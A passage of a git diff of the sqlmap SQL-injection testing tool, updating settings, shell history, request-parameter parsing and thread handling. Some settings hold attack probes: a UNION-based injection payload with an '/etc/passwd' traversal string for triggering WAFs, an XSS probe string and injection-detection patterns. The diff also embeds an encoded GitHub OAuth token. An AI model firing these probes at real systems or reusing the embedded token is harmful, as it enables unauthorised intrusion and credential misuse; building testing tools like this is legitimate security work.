 EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
@@ -405,7 +417,7 @@ ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
 DUMMY_SQL_INJECTION_CHARS = ";()'"
 
 # Simple check against dummy users
-DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\A-\d+\Z"
+DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
 
 # Extensions skipped by crawler
 CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
@@ -420,7 +432,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
 BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
 
 # Payload used for checking of existence of IDS/WAF (dummier the better)
-IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
+IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
 
 # Vectors used for provoking specific WAF/IDS/IPS behavior(s)
 WAF_ATTACK_VECTORS = (
@@ -434,8 +446,8 @@ WAF_ATTACK_VECTORS = (
 # Used for status representation in dictionary attack phase
 ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 
-# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
-BIGARRAY_CHUNK_LENGTH = 4096
+# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
+BIGARRAY_CHUNK_SIZE = 1024 * 1024
 
 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 256
@@ -470,6 +482,9 @@ DEFAULT_COOKIE_DELIMITER = ';'
 # Unix timestamp used for forcing cookie expiration when provided with --load-cookies
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
+# Github OAuth token used for creating an automatic Issue for unhandled exceptions
+GITHUB_REPORT_OAUTH_TOKEN = "YzQzM2M2YzgzMDExN2I5ZDMyYjAzNTIzODIwZDA2MDFmMmVjODI1Ng=="
+
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32
 
@@ -480,7 +495,7 @@ HASHDB_FLUSH_RETRIES = 3
 HASHDB_END_TRANSACTION_RETRIES = 3
 
 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "nXkbwIURlN"  # rd74b803 "".join(random.sample(string.ascii_letters, 10))
+HASHDB_MILESTONE_VALUE = "JHjrBugdDA"  # "".join(random.sample(string.ascii_letters, 10))
 
 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -504,7 +519,10 @@ MAX_DNS_LABEL = 63
 DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
 
 # Alphabet used for heuristic checks
-HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
+HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
+
+# String used for dummy XSS check of a tested parameter value
+DUMMY_XSS_CHECK_APPENDIX = "<'\">"
 
 # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
@@ -528,7 +546,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10
 
 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
+BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
 
 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
@@ -540,7 +558,7 @@ MAX_HELP_OPTION_LENGTH = 18
 MAX_CONNECT_RETRIES = 100
 
 # Strings for detecting formatting errors
-FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
+FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
 
 # Regular expression used for extracting ASP.NET view state values
 VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
@@ -566,6 +584,9 @@ JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+)
 # Regular expression used for detecting multipart POST data
 MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
 
+# Regular expression used for detecting Array-like POST data
+ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
+
 # Default POST data content-type
 DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
 
@@ -581,15 +602,27 @@ MIN_BINARY_DISK_DUMP_SIZE = 100
 # Regular expression used for extracting form tags
 FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
 
+# Maximum number of lines to save in history file
+MAX_HISTORY_LENGTH = 1000
+
 # Minimum field entry length needed for encoded content (hex, base64,...) check
 MIN_ENCODED_LEN_CHECK = 5
 
 # Timeout in seconds in which Metasploit remote session has to be initialized
 METASPLOIT_SESSION_TIMEOUT = 300
 
+# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html
+LOBLKSIZE = 2048
+
+# Suffix used to mark variables having keyword names
+EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
+
 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
 
+# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
+CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
+
 # Prefixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_PREFIXES = {
     OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
@@ -605,6 +638,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
 # Character used as a boundary in kb.chars (preferably less frequent letter)
 KB_CHARS_BOUNDARY_CHAR = 'q'
 
+# Letters of lower frequency used in kb.chars
+KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
+
 # CSS style used in HTML dump format
 HTML_DUMP_CSS_STYLE = """<style>
 table{
diff --git a/lib/core/shell.py b/lib/core/shell.py
index fdf769989..1e7f35d50 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -13,14 +13,60 @@ from lib.core import readlineng as readline
 from lib.core.common import Backend
 from lib.core.data import logger
 from lib.core.data import paths
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import OS
+from lib.core.settings import MAX_HISTORY_LENGTH
 
-def saveHistory():
-    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
-    readline.write_history_file(historyPath)
+def readlineAvailable():
+    """
+    Check if the readline is available. By default
+    it is not in Python default installation on Windows
+    """
 
-def loadHistory():
-    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
+    return readline._readline is not None
+
+def clearHistory():
+    if not readlineAvailable():
+        return
+
+    readline.clear_history()
+
+def saveHistory(completion=None):
+    if not readlineAvailable():
+        return
+
+    if completion == AUTOCOMPLETE_TYPE.SQL:
+        historyPath = paths.SQL_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.OS:
+        historyPath = paths.OS_SHELL_HISTORY
+    else:
+        historyPath = paths.SQLMAP_SHELL_HISTORY
+
+    try:
+        with open(historyPath, "w+"):
+            pass
+    except:
+        pass
+
+    readline.set_history_length(MAX_HISTORY_LENGTH)
+    try:
+        readline.write_history_file(historyPath)
+    except IOError, msg:
+        warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
+        logger.warn(warnMsg)
+
+def loadHistory(completion=None):
+    if not readlineAvailable():
+        return
+
+    clearHistory()
+
+    if completion == AUTOCOMPLETE_TYPE.SQL:
+        historyPath = paths.SQL_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.OS:
+        historyPath = paths.OS_SHELL_HISTORY
+    else:
+        historyPath = paths.SQLMAP_SHELL_HISTORY
 
     if os.path.exists(historyPath):
         try:
@@ -47,14 +93,12 @@ class CompleterNG(rlcompleter.Completer):
 
         return matches
 
-def autoCompletion(sqlShell=False, osShell=False):
-    # First of all we check if the readline is available, by default
-    # it is not in Python default installation on Windows
-    if not readline._readline:
+def autoCompletion(completion=None, os=None, commands=None):
+    if not readlineAvailable():
         return
 
-    if osShell:
-        if Backend.isOs(OS.WINDOWS):
+    if completion == AUTOCOMPLETE_TYPE.OS:
+        if os == OS.WINDOWS:
             # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
             completer = CompleterNG({
                                       "copy": None, "del": None, "dir": None,
@@ -75,5 +119,11 @@ def autoCompletion(sqlShell=False, osShell=False):
         readline.set_completer(completer.complete)
         readline.parse_and_bind("tab: complete")
 
-    loadHistory()
-    atexit.register(saveHistory)
+    elif commands:
+        completer = CompleterNG(dict(((_, None) for _ in commands)))
+        readline.set_completer_delims(' ')
+        readline.set_completer(completer.complete)
+        readline.parse_and_bind("tab: complete")
+
+    loadHistory(completion)
+    atexit.register(saveHistory, completion)
diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py
index 6b34e4fba..eee73afdd 100644
--- a/lib/core/subprocessng.py
+++ b/lib/core/subprocessng.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/target.py b/lib/core/target.py
index 6ed69acba..c1bf921bd 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -17,6 +17,8 @@ from lib.core.common import Backend
 from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import intersect
+from lib.core.common import normalizeUnicode
+from lib.core.common import openFile
 from lib.core.common import paramToDict
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
@@ -38,13 +40,17 @@ from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapMissingPrivileges
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import _setDBMS
 from lib.core.option import _setKnowledgeBaseAttributes
 from lib.core.option import _setAuthCred
 from lib.core.settings import ASTERISK_MARKER
+from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import HOST_ALIASES
+from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
 from lib.core.settings import JSON_RECOGNITION_REGEX
 from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
 from lib.core.settings import MULTIPART_RECOGNITION_REGEX
@@ -91,6 +97,7 @@ def _setRequestParams():
 
     if conf.data is not None:
         conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
+        hintNames = []
 
         def process(match, repl):
             retVal = match.group(0)
@@ -103,7 +110,8 @@ def _setRequestParams():
                         retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
                     else:
                         break
-
+                if CUSTOM_INJECTION_MARK_CHAR in retVal:
+                    hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
             return retVal
 
         if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
@@ -115,6 +123,9 @@ def _setRequestParams():
             else:
                 kb.processUserMarks = not test or test[0] not in ("n", "N")
 
+                if kb.processUserMarks:
+                    kb.testOnlyCustom = True
+
         if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
             if re.search(JSON_RECOGNITION_REGEX, conf.data):
                 message = "JSON data found in %s data. " % conf.method
@@ -126,6 +137,12 @@ def _setRequestParams():
                     conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
                     conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
                     conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
+                    match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
+                    if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
+                        _ = match.group(2)
+                        _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
+                        _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
+                        conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
                     kb.postHint = POST_HINT.JSON
 
             elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
@@ -140,6 +157,17 @@ def _setRequestParams():
                     conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
                     kb.postHint = POST_HINT.JSON_LIKE
 
+            elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
+                message = "Array-like data found in %s data. " % conf.method
+                message += "Do you want to process it? [Y/n/q] "
+                test = readInput(message, default="Y")
+                if test and test[0] in ("q", "Q"):
+                    raise SqlmapUserQuitException
+                elif test[0] not in ("n", "N"):
+                    conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
+                    conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
+                    kb.postHint = POST_HINT.ARRAY_LIKE
+
             elif re.search(XML_RECOGNITION_REGEX, conf.data):
                 message = "SOAP/XML data found in %s data. " % conf.method
                 message += "Do you want to process it? [Y/n/q] "
@@ -152,7 +180,7 @@ def _setRequestParams():
                     kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
 
             elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
-                message = "Multipart like data found in %s data. " % conf.method
+                message = "Multipart-like data found in %s data. " % conf.method
                 message += "Do you want to process it? [Y/n/q] "
                 test = readInput(message, default="Y")
                 if test and test[0] in ("q", "Q"):
@@ -180,7 +208,7 @@ def _setRequestParams():
 
     kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
 
-    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or ""):
+    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
         warnMsg = "you've provided target URL without any GET "
         warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
         warnMsg += "and without providing any POST parameters "
@@ -210,6 +238,15 @@ def _setRequestParams():
                 else:
                     kb.processUserMarks = not test or test[0] not in ("n", "N")
 
+                    if kb.processUserMarks:
+                        kb.testOnlyCustom = True
+
+                        if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
+                            warnMsg = "it seems that you've provided empty parameter value(s) "
+                            warnMsg += "for testing. Please, always use only valid parameter values "
+                            warnMsg += "so sqlmap could be able to run properly"
+                            logger.warn(warnMsg)
+
             if not kb.processUserMarks:
                 if place == PLACE.URI:
                     query = urlparse.urlsplit(value).query
@@ -245,7 +282,15 @@ def _setRequestParams():
                     parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
 
                     for i in xrange(len(parts) - 1):
-                        conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
+                        name = None
+                        if kb.postHint:
+                            for ending, _ in hintNames:
+                                if parts[i].endswith(ending):
+                                    name = "%s %s" % (kb.postHint, _)
+                                    break
+                        if name is None:
+                            name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
+                        conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
 
                     if place == PLACE.URI and PLACE.GET in conf.paramDict:
                         del conf.paramDict[PLACE.GET]
@@ -313,6 +358,22 @@ def _setRequestParams():
         errMsg += "within the given request data"
         raise SqlmapGenericException(errMsg)
 
+    if conf.csrfToken:
+        if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
+            errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
+            errMsg += "found in provided GET, POST, Cookie or header values"
+            raise SqlmapGenericException(errMsg)
+    else:
+        for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+            for parameter in conf.paramDict.get(place, {}):
+                if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
+                    message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
+                    message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
+                    test = readInput(message, default="N")
+                    if test and test[0] in ("y", "Y"):
+                        conf.csrfToken = parameter
+                    break
+
 def _setHashDB():
     """
     Check and set the HashDB SQLite file for query resume functionality.
@@ -448,7 +509,22 @@ def _setResultsFile():
 
     if not conf.resultsFP:
         conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
-        conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+        try:
+            conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+        except (OSError, IOError), ex:
+            try:
+                warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
+                conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1]
+                conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+                warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
+                logger.warn(warnMsg)
+            except IOError, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapSystemException(errMsg)
+
         conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
 
         logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
@@ -469,7 +545,7 @@ def _createFilesDir():
         except OSError, ex:
             tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
             warnMsg = "unable to create files directory "
-            warnMsg += "'%s' (%s). " % (conf.filePath, ex)
+            warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir
             logger.warn(warnMsg)
 
@@ -491,7 +567,7 @@ def _createDumpDir():
         except OSError, ex:
             tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
             warnMsg = "unable to create dump directory "
-            warnMsg += "'%s' (%s). " % (conf.dumpPath, ex)
+            warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
             warnMsg += "Using temporary directory '%s' instead" % tempDir
             logger.warn(warnMsg)
 
@@ -516,25 +592,41 @@ def _createTargetDirs():
                 os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
             warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
             logger.warn(warnMsg)
-        except OSError, ex:    
-            tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+        except (OSError, IOError), ex:
+            try:
+                tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+            except Exception, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapSystemException(errMsg)
+
             warnMsg = "unable to create regular output directory "
-            warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
-            warnMsg += "Using temporary directory '%s' instead" % tempDir
+            warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
+            warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
             logger.warn(warnMsg)
 
             paths.SQLMAP_OUTPUT_PATH = tempDir
 
-    conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), getUnicode(conf.hostname))
+    conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
 
     if not os.path.isdir(conf.outputPath):
         try:
             os.makedirs(conf.outputPath, 0755)
-        except OSError, ex:
-            tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+        except (OSError, IOError), ex:
+            try:
+                tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+            except Exception, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapSystemException(errMsg)
+
             warnMsg = "unable to create output directory "
-            warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
-            warnMsg += "Using temporary directory '%s' instead" % tempDir
+            warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
+            warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
             logger.warn(warnMsg)
 
             conf.outputPath = tempDir
@@ -544,9 +636,9 @@ def _createTargetDirs():
             f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
             f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
             if conf.data:
-                f.write("\n\n%s" % conf.data)
+                f.write("\n\n%s" % getUnicode(conf.data))
     except IOError, ex:
-        if "denied" in str(ex):
+        if "denied" in getUnicode(ex):
             errMsg = "you don't have enough permissions "
         else:
             errMsg = "something went wrong while trying "
diff --git a/lib/core/testing.py b/lib/core/testing.py
index c2c96de0a..8339cbc32 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -285,7 +285,7 @@ def runCase(parse):
     elif result is False:  # this means no SQL injection has been detected - if None, ignore
         retVal = False
 
-    console = getUnicode(console, system=True)
+    console = getUnicode(console, encoding=sys.stdin.encoding)
 
     if parse and retVal:
         with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
diff --git a/lib/core/threads.py b/lib/core/threads.py
index 8eb10f99c..8647ecfd0 100644
--- a/lib/core/threads.py
+++ b/lib/core/threads.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -106,20 +106,25 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
     kb.threadContinue = True
     kb.threadException = False
 
-    if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
+    if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
         while True:
             message = "please enter number of threads? [Enter for %d (current)] " % numThreads
             choice = readInput(message, default=str(numThreads))
-            if choice and choice.isdigit():
-                if int(choice) > MAX_NUMBER_OF_THREADS:
-                    errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
-                    logger.critical(errMsg)
-                else:
-                    numThreads = int(choice)
-                    break
+            if choice:
+                skipThreadCheck = False
+                if choice.endswith('!'):
+                    choice = choice[:-1]
+                    skipThreadCheck = True
+                if choice.isdigit():
+                    if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck:
+                        errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
+                        logger.critical(errMsg)
+                    else:
+                        conf.threads = numThreads = int(choice)
+                        break
 
         if numThreads == 1:
-            warnMsg = "running in a single-thread mode. This could take a while."
+            warnMsg = "running in a single-thread mode. This could take a while"
             logger.warn(warnMsg)
 
     try:
diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py
index 6377d54dd..205b77a94 100644
--- a/lib/core/unescaper.py
+++ b/lib/core/unescaper.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/update.py b/lib/core/update.py
index 1803139b2..f2a8de322 100644
--- a/lib/core/update.py
+++ b/lib/core/update.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -41,7 +41,7 @@ def update():
         logger.debug(debugMsg)
 
         dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
-        process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
+        process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
         pollProcess(process, True)
         stdout, stderr = process.communicate()
         success = not process.returncode
diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py
index 4eb3ec8ce..bc4e486a1 100644
--- a/lib/core/wordlist.py
+++ b/lib/core/wordlist.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -9,6 +9,7 @@ import os
 import zipfile
 
 from lib.core.exception import SqlmapDataException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.settings import UNICODE_ENCODING
 
 class Wordlist(object):
@@ -21,6 +22,7 @@ class Wordlist(object):
         self.fp = None
         self.index = 0
